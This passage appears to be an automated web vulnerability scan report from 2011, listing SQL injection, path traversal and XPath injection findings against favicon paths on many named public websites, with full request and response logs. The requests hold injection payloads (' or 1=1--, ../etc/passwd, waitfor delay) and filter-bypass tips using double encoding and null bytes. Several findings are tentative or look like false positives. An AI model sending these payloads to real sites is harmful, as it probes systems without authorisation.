Set-Cookie: DealTimeUserID=Q2kuror0CK; Domain=.dealtime.com; Expires=Thu, 01-Apr-2021 13:39:15 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 13:39:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body id="error">
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealtime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: brc=www0.dealtime.com; Domain=dealtime.com; Expires=Sun, 03-Apr-2011 13:39:15 GMT; Path=/
Location: http://www0.dealtime.com/favicon.ico''
Set-Cookie: session=ts%3D2; Domain=.dealtime.com; Path=/
Content-Length: 0
Date: Sat, 02 Apr 2011 13:39:15 GMT
Connection: close


1.6. http://www.essortment.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.essortment.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Content-Length: 122
Server: TornadoServer/0.1
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:35:16 GMT
Connection: close

You don't even get a site specific 404: HTTP 500: Internal Server Error ({
"GrammarParsingError": "Invalid CQL : '"
})

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: TornadoServer/0.1
Date: Sat, 02 Apr 2011 13:35:17 GMT
Content-Length: 14756
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

1.7. http://www.ftd.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13030870'%20or%201%3d1--%20 and 13030870'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico13030870'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Sat, 02 Apr 2011 13:47:27 GMT
X-Varnish: 1965658938
Age: 14
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1965658938</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /favicon.ico13030870'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=BF7AFCBE5D2F105D000DE46EBF25E07E; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=BF7AFCBE5D2F105D000DE46EBF25E07E; Path=/; Domain=.ftd.com; expires=Sat, 02-04-2021 13:47:27 GMT
Vary: Accept-Encoding
X-Accelerator-Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-VR-Note: no-gzip: UA=curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 80223
Date: Sat, 02 Apr 2011 13:47:28 GMT
X-Varnish: 1841592671
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20101223/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our oner
...[SNIP]...

1.8. http://www.guitarcenter.com/favicon.ico [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.guitarcenter.com
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
SN: 88
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:15:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527%2527
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:10 GMT
Server: Microsoft-IIS/6.0
ETag:
SN: 27
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=ouzuzrhrhudggjo104yitfb0; path=/; HttpOnly
Set-Cookie: ref=; path=/
Set-Cookie: ref_d=4/2/2011 10:15:10 AM; path=/
Set-Cookie: source=; path=/
Set-Cookie: ad_id=; path=/
Set-Cookie: orig_ref=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_ref_d=4/2/2011 10:15:10 AM; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_source=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_ad_id=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: uid=2e7cae34-cedd-47d9-9f54-c586e23e3b35; expires=Mon, 02-May-2011 14:15:10 GMT; path=/
Set-Cookie: IsLoyaltyAvailable=False; expires=Mon, 02-May-2011 14:15:10 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...

1.9. http://www.inc.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 02 Apr 2011 14:21:04 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Connection: close

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:21:05 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 39399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...

1.10. http://www.psu.edu/favicon.ico [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:38 GMT
Server: Apache/1.3.41 (Unix)
Content-Type: text/html
Content-Length: 5468

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</a> &gt; Error 404 - Page not found
           <!-- InstanceEndEditable -->
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:38 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Wed, 08 Jun 2005 11:51:35 GMT
ETag: "135d-400-42a6dbc7"
Accept-Ranges: bytes
Content-Length: 1024
Content-Type: image/x-icon

.PNG
.
...IHDR................a...    pHYs.................gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F...vIDATx.b....!e.v.{...1...W@.............?.._|d.../.....000310022+.
......@..E...}..
...[SNIP]...

1.11. http://www.psu.edu/favicon.ico [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3'
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:30 GMT
Server: Apache/1.3.41 (Unix)
Content-Type: text/html
Content-Length: 5468

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</a> &gt; Error 404 - Page not found
           <!-- InstanceEndEditable -->
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3''
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:30 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Wed, 08 Jun 2005 11:51:35 GMT
ETag: "135d-400-42a6dbc7"
Accept-Ranges: bytes
Content-Length: 1024
Content-Type: image/x-icon

.PNG
.
...IHDR................a...    pHYs.................gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F...vIDATx.b....!e.v.{...1...W@.............?.._|d.../.....000310022+.
......@..E...}..
...[SNIP]...

1.12. http://www.scholastic.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.scholastic.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11468862'%20or%201%3d1--%20 and 11468862'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico11468862'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scholastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.64
Content-Type: text/html
X-Powered-By: ASP.NET
Location: http://www2.scholastic.com/browse/lessonplan.jsp?id=483
Content-Length: 0
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:54:12 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSDACTBQ=JOFOAFGDDIPFMOBAKFPNGCPM; path=/
Cache-Control: private

Request 2

GET /favicon.ico11468862'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scholastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 5443
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:54:12 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSDACTBQ=KOFOAFGDFDKJCCJFLLJDMEJO; path=/
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Error Page</title>
<link rel="stylesheet" href="/css/header.css" type="text/css">
<script type="text/javascript" type="text/javascript" src="/menu/templates/global.js"></script>
<!-- MSN -->
<script type="text/javascript" src="/menu/templates/msnkids.js"></script>
<!-- /MSN -->
</head>
<body >

<div id="schlPageWrapper">

<script type="text/javascript">imgRoot = "/universal/images/";</script>
<script type="text/javascript" src="/universal/universal.js"></script>


<div id="schlPageContent">

<div id="schlHeader">

<table border="0" cellpadding="0" cellspacing="0" id="innerHeader">
<tr valign="bottom">
<td id="schlChannel">&nbsp;</td>
<td>
<div id="schlSearchBox">
<form name="searchForm" action=" http://www2.scholastic.com/browse/search" method="get" onsubmit="return setItHead();"><div id="gSearch">
               <table border="0" cellpadding="0" cellspacing="0" width="278">
       <tr>
       <td id="txtSearch"><input type="text" size="20" name="query" value="" class="txtSearch" /></td>
       <td><input type="image" src="/images/nav3.o/btnNavSearch.gif" border="0" class="btnSearch" alt="Search" /></td>
       </tr>
       </table>
   </div>            
       
   </form>
</div>
</td>
</tr>
</table>


</div><!-- /header -->


<div id="schlMainContent">

<div id="schlContent">

<!--div id="schlSkyscraper">&nbsp;</div-->

<div id="schlLegacy">
<img src="/images/nav3.o/wrapper_box_top.jpg" width="743" height="12" alt="" class="dBlock" />
<div class="box743Borders">
<!--begin page content-->

<!-- REQUEST URI: /404error.asp -->
<!-- curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 -->
<!-- generic.html -->


<!-- ORIGINAL BODY TAG --
...[SNIP]...

2. File path traversal
There are 4 instances of this issue:


2.1. http://www.bodybuilding.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bodybuilding.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bodybuilding.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny3
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:40:37 GMT
Content-Length: 30357
Connection: close

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html>
<head>
<!-- Rawberry -->
<title>Bodybuilding.com - PAGE NOT FOUND! 404 Error.</title>
<meta name
...[SNIP]...
server=""
s.channel="root"
s.products=""
s.prop30="B"
s.eVar30="B"
s.prop41="Anonymous"
s.eVar41="Anonymous"
s.prop1="Fun: Article"
s.eVar1="Fun: Article"
s.prop2="Article"
s.eVar2="Article"
s.prop33="Root: PAGE NOT FOUND! 404 Error."
s.eVar33="Root: PAGE NOT FOUND! 404 Error."
s.events="event3"
s.pageType=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_cod
...[SNIP]...

2.2. http://www.buzzfeed.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.buzzfeed.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzfeed.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 02 Apr 2011 13:00:01 GMT
ETag: "1190105-69e2-49fef1ab65640"
Accept-Ranges: bytes
Content-Length: 27106
Vary: Accept-Encoding,User-Agent
X-BuzzFeed: feed5
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script type="text/javascript">
fb_is_enabled = false;

fb_is_enabled = true;


var BF_STATIC = {static_root: 'http://s-ak.buzzfed.com/static', image_root: 'http://s-ak.buzzfed.com', web_root: '', version: '1301693588', facebook_enabled: fb_is_enabled, fb_app_id:'45075597673', fb_api_key: 'c11330e934b70cdeed6
...[SNIP]...

2.3. http://www.cabelas.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cabelas.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cabelas.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 07:00:02 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=604800
Date: Sat, 02 Apr 2011 13:32:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html >
       <head>
       <title>Cabela's - Page Not Found</title>
       <!--[if lt IE
...[SNIP]...
<li class="heading">Other Ways to Shop Home &amp; Cabin:</li>
...[SNIP]...

2.4. http://www.info.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.info.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico..\..\..\..\..\..\..\..\..\..\winnt\win.ini was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico..\..\..\..\..\..\..\..\..\..\winnt\win.ini HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.info.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sat, 02 Apr 2011 13:42:41 GMT
Server: Apache
Set-Cookie: a=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1301751761+last_cmp++engineset+int-only; expires=Wed, 01-Apr-2037 20:50:37 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 52097

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - favicon.ico....................winntwin.ini - www.Info.com</title><link rel="shortcut icon" href="http:
...[SNIP]...
020039722EE73D3D91B91E26214CF" target="_blank" title="http://forum.emsisoft.com/Default.aspx?g=posts&t=6235" class=d>... PROGRA~1\Skype\Toolbars\INTERN~1\favicon.ico O9 - Extra ... Displaying WIN.INI: ; for 16-bit app support [fonts] ... C:\WINNT\PCHealth\HelpCtr\Binaries: ...</a>
...[SNIP]...

3. XPath injection
There are 4 instances of this issue:


3.1. http://www.cartoonnetwork.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cartoonnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:45:44 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 29979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

3.2. http://www.ning.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ning.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
X-XN-Trace-Token: 035d4f9a-70d6-4175-ab94-68258d4901cd
Server: Ning HTTP Server 2.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=2888191c-8dd6-4fbf-b6df-ac955ebc0b1e;Path=/;Domain=.ning.com;Expires=Tue, 30-Mar-21 13:26:00 GMT
Set-Cookie: ning_session="nVdNOstw1Wwd3pQ9MfERZ5XA7iW5omP426d+IYw4032/qSqXv9ggV+DXyj999oWzF1tcrKfyFAU=";Path=/;Domain=ning.com;Expires=Sat, 02-Apr-11 14:26:00 GMT
XN-ResponseFrom: 10.16.47.166,(10.16.106.52,301,33)
Date: Sat, 02 Apr 2011 13:26:00 GMT
Set-Cookie: P=a%3A2%3A%7Bs%3A6%3A%22locale%22%3BN%3Bs%3A2%3A%22ab%22%3Bi%3A1691950182%3B%7D; expires=Tue, 30-Mar-2021 13:26:00 GMT; path=/
Location: http://www.ning.com/
Content-Type: text/html; charset=utf-8
Content-Length: 19093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<script>xp_subscribe('LogPageView', function(label_1, label_2, client_page_load_time, server_page_load_time) { xg_track_dynamic('PageView',{date:'xdate',host:'xhost',path:'xpath',user_agent:'xua',ip:'xip',cookie:'s',subdomain:'spretzel',screen_name:'s',section:'s',is_owner:'b0',is_admin:'b0',is_member:'b0',join_date:'80',referrer:'s',reload_count:'20',client_page_load_time_de
...[SNIP]...

3.3. http://www.thefind.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thefind.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefind.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:13 GMT
Server: Apache
Set-Cookie: flsid=899145ae9fb41c146ae6e41bb855b653; path=/
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 31 Mar 2011 05:45:51 GMT
